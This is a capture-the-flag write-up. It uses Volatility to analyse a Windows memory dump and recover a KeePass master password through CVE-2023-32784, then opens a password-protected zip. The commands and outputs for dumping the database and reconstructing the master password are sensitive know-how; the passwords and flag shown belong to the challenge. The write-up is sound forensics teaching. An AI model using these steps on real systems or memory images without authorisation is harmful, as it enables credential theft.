Description
Find the password of the zip file
1
2
3
4
5
6
|
β secretZip ls -la
total 6489204
drwxrwxr-x 2 thib thib 4096 juin 24 15:44 .
drwxrwxr-x 8 thib thib 4096 juin 24 23:42 ..
-rwx--x--x 1 thib thib 6357400688 juin 20 01:00 image.dmp
-rw-rw-r-- 1 thib thib 269 juin 20 00:49 important.zip
|
Write up
Looking at the list of files, you’d think you’d have to find the zip password in the image.dmp file.
1
2
|
β secretZip file image.dmp
image.dmp: ELF 64-bit LSB core file, x86-64, version 1 (SYSV)
|
This is a memory dump of a running machine, but what filetype exactly ?
1
2
3
4
5
6
7
|
β secretZip readelf -n image.dmp
Displaying notes found at file offset 0x00000548 with length 0x00006728:
Owner Data size Description
VBCORE 0x00000018 Unknown note type: (0x00000b00)
description data: de c0 1a c0 05 00 01 00 18 00 00 00 26 00 01 06 5e 57 02 00 03 00 00 00
VBCPU 0x00002240 Unknown note type: (0x00000b01)
|
Itβs a VirtualBox memory dump… (VBCORE, VBCPU)
We can use volatility to find the OS and version associated with this dump.
1
2
3
4
5
|
β secretZip vol2 -f image.dmp imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG searchβ¦
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
...
|
That’s good news, because we won’t need to build a profile. Just use one of the provided ones. We can look at the processes that were running and we should find something related to a zip.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
β secretZip vol2 --profile=Win7SP0x86 -f image.dmp pslist
Volatility Foundation Volatility Framework 2.6.1
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x84440a68 System 4 0 89 500 ------ 0 2023-06-19 22:52:52 UTC+0000
0x8557cc00 smss.exe 280 4 2 31 ------ 0 2023-06-19 22:52:52 UTC+0000
0x86d10030 csrss.exe 360 344 9 351 0 0 2023-06-19 22:52:53 UTC+0000
0x8550ad40 wininit.exe 412 344 3 80 0 0 2023-06-19 22:52:53 UTC+0000
0x8550a5b8 csrss.exe 420 404 11 172 1 0 2023-06-19 22:52:53 UTC+0000
0x86ddec90 winlogon.exe 476 404 4 113 1 0 2023-06-19 22:52:53 UTC+0000
0x86803d40 services.exe 512 412 8 191 0 0 2023-06-19 22:52:53 UTC+0000
0x86801c08 lsass.exe 528 412 7 541 0 0 2023-06-19 22:52:53 UTC+0000
0x8681cd40 lsm.exe 536 412 10 146 0 0 2023-06-19 22:52:53 UTC+0000
0x87003430 svchost.exe 652 512 10 351 0 0 2023-06-19 22:52:55 UTC+0000
0x8705f030 VBoxService.ex 716 512 14 127 0 0 2023-06-19 22:52:55 UTC+0000
0x87085878 svchost.exe 784 512 7 246 0 0 2023-06-19 22:52:55 UTC+0000
0x870af8b8 svchost.exe 856 512 21 474 0 0 2023-06-19 22:52:55 UTC+0000
0x870d4030 svchost.exe 908 512 13 304 0 0 2023-06-19 22:52:55 UTC+0000
0x870e2030 svchost.exe 944 512 33 902 0 0 2023-06-19 22:52:55 UTC+0000
0x870f65e8 audiodg.exe 1032 856 6 121 0 0 2023-06-19 22:52:55 UTC+0000
0x86834960 svchost.exe 1080 512 17 447 0 0 2023-06-19 22:52:55 UTC+0000
0x8711fd40 svchost.exe 1180 512 17 366 0 0 2023-06-19 22:52:55 UTC+0000
0x871e96f0 spoolsv.exe 1364 512 13 274 0 0 2023-06-19 22:52:55 UTC+0000
0x872172f0 svchost.exe 1392 512 19 313 0 0 2023-06-19 22:52:55 UTC+0000
0x8726b940 svchost.exe 1496 512 15 258 0 0 2023-06-19 22:52:55 UTC+0000
0x8767a030 sppsvc.exe 1480 512 6 145 0 0 2023-06-19 22:54:53 UTC+0000
0x8710a030 svchost.exe 680 512 12 305 0 0 2023-06-19 22:54:53 UTC+0000
0x844e89a0 SearchIndexer. 1964 512 12 549 0 0 2023-06-19 22:54:53 UTC+0000
0x8564b730 taskhost.exe 1548 512 9 159 1 0 2023-06-19 22:55:42 UTC+0000
0x871a64a0 dwm.exe 1924 908 4 56 1 0 2023-06-19 22:55:42 UTC+0000
0x85435780 explorer.exe 1872 1656 22 751 1 0 2023-06-19 22:55:42 UTC+0000
0x86f4cd40 VBoxTray.exe 616 1872 15 147 1 0 2023-06-19 22:55:42 UTC+0000
0x85476d40 wmpnetwk.exe 2412 512 11 211 0 0 2023-06-19 22:55:48 UTC+0000
0x84592630 KeePass.exe 2864 1872 11 344 1 0 2023-06-19 22:55:58 UTC+0000
0x87115030 WmiPrvSE.exe 3216 652 7 116 0 0 2023-06-19 22:56:58 UTC+0000
|
Finally, there’s nothing like an executable for zipping files, but there is a keepass running on the machine. Logically, we can suppose that there is an associated .kdbx file.
1
2
3
|
β secretZip vol2 --profile=Win7SP0x86 -f image.dmp filescan | grep .kdbx
Volatility Foundation Volatility Framework 2.6.1
0x000000007ccd6a18 8 0 R--rwd \Device\HarddiskVolume2\Users\Udriano\Documents\secret.kdbx
|
Indeed, we find a secret.kdbx file. Let’s try to dump it.
1
2
3
4
5
|
β secretZip vol2 --profile=Win7SP0x86 -f image.dmp dumpfiles -Q 0x000000007ccd6a18 -D .
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x7ccd6a18 None \Device\HarddiskVolume2\Users\Udriano\Documents\secret.kdbx
β secretZip file file.None.0x878d6340.dat
file.None.0x878d6340.dat: Keepass password database 2.x KDBX
|
That’s it, we’ve got our Keepass database, which probably contains the zip password. But we’re missing the master password to open Keepass…
We can look in the memory of the Keepass process, the password may be clear.
1
2
3
4
|
β secretZip vol2 --profile=Win7SP0x86 -f image.dmp memdump -p 2864 -D .
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
Writing KeePass.exe [ 2864] to 2864.dmp
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
β secretZip cat 2864.dmp | grep Password
<String>
<Key>Notes</Key>
<Value></Value>
</String>
<String>
<Key>Password</Key>
<Value Protected="True">/fLnJG9NXT4o5/0DRVarXVGJcBA=</Value>
</String>
<String>
<Key>Title</Key>
<Value>secret zip</Value>
</String>
<String>
<Key>URL</Key>
<Value></Value>
</String>
<String>
<Key>UserName</Key>
<Value></Value>
</String>
|
There’s some very interesting stuff, but no trace of the master password. We do, however, have confirmation that the zip password is present in the keepass.
It’s quite reassuring that the password is not present in clear text, but it’s not good news for us…
I did some research to find out how to recover this password and came across a volatility plugin that uses a CVE (CVE-2023-32784) to recover the master password.
1
|
In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered.
|
So I installed the plugin on my volatility3 and launched it by entering the keepass PID.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
β secretZip vol3 -f image.dmp windows.keepass --pid 2864
Offset Size Constructed_Password
0x1f2e000 0x1000 3
0x1f2f000 0x1000 3r
0x1f31000 0x1000 3r3
0x1f32000 0x1000 3r3I
0x1f32000 0x1000 3r3Is
0x1f32000 0x1000 3r3IsM
0x1f33000 0x1000 3r3IsMy
0x1f33000 0x1000 3r3IsMyS
0x1f34000 0x1000 3r3IsMySi
0x1f34000 0x1000 3r3IsMySim
0x1f35000 0x1000 3r3IsMySimp
0x1f35000 0x1000 3r3IsMySimpl
0x1f37000 0x1000 3r3IsMySimpl3
0x1f38000 0x1000 3r3IsMySimpl3P
0x1f4f000 0x1000 3r3IsMySimpl3P@
0x1f4f000 0x1000 3r3IsMySimpl3P@s
0x1f50000 0x2000 3r3IsMySimpl3P@ss
0x1f50000 0x2000 3r3IsMySimpl3P@ssw
0x1f50000 0x2000 3r3IsMySimpl3P@ssw0
0x1f50000 0x2000 3r3IsMySimpl3P@ssw0r
0x1f50000 0x2000 3r3IsMySimpl3P@ssw0rd
0x1f52000 0x1000 3r3IsMySimpl3P@ssw0rd
0x6a3f1000 0x1000 3r3IsMySimpl3P@ssw0rd
|
As the description of the feat tells us, the first character is missing. We can easily guess that it’s an H.
Master Password : H3r3IsMySimpl3P@ssw0rd
Now all we need to do is open the keepass, retrieve the zip password, decompress the archive and retrieve the flag.
Zip Password : nljVikExMW0yebj3KAMf
1
2
3
4
5
6
7
8
|
β secretZip unzip important.zip
Archive: important.zip
[important.zip] secret.txt password:
inflating: secret.txt
β secretZip cat secret.txt
Well played !
Here is the flag : MCTF{K33P@ss_M@st3r_P@ssw0rd_Dump3r}
|
Flag
MCTF{K33P@ss_M@st3r_P@ssw0rd_Dump3r}
